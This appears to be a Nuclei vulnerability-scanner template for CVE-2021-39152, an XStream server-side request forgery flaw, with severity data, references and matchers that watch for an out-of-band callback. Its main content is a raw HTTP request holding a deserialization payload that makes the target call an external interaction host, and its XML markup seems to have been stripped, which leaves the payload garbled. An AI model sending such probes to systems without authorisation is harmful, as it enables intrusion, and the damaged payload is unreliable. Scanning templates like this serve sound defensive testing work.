id: CVE-2021-39152 info: name: XStream <1.4.18 - Server-Side Request Forgery author: pwnhxl severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://x-stream.github.io/CVE-2021-39152.html - https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2 - https://security.netapp.com/advisory/ntap-20210923-0003/ - https://nvd.nist.gov/vuln/detail/cve-2021-39152 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.5 cve-id: CVE-2021-39152 cwe-id: CWE-918,CWE-502 epss-score: 0.00612 tags: cve,cve2021,xstream,ssrf,oast metadata: max-request: 1 http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml http://{{interactsh-url}}/internal/ GBK 1111 b 0 0 http://{{interactsh-url}}/internal/ 1111 b 0 0 matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # Enhanced by md on 2023/04/13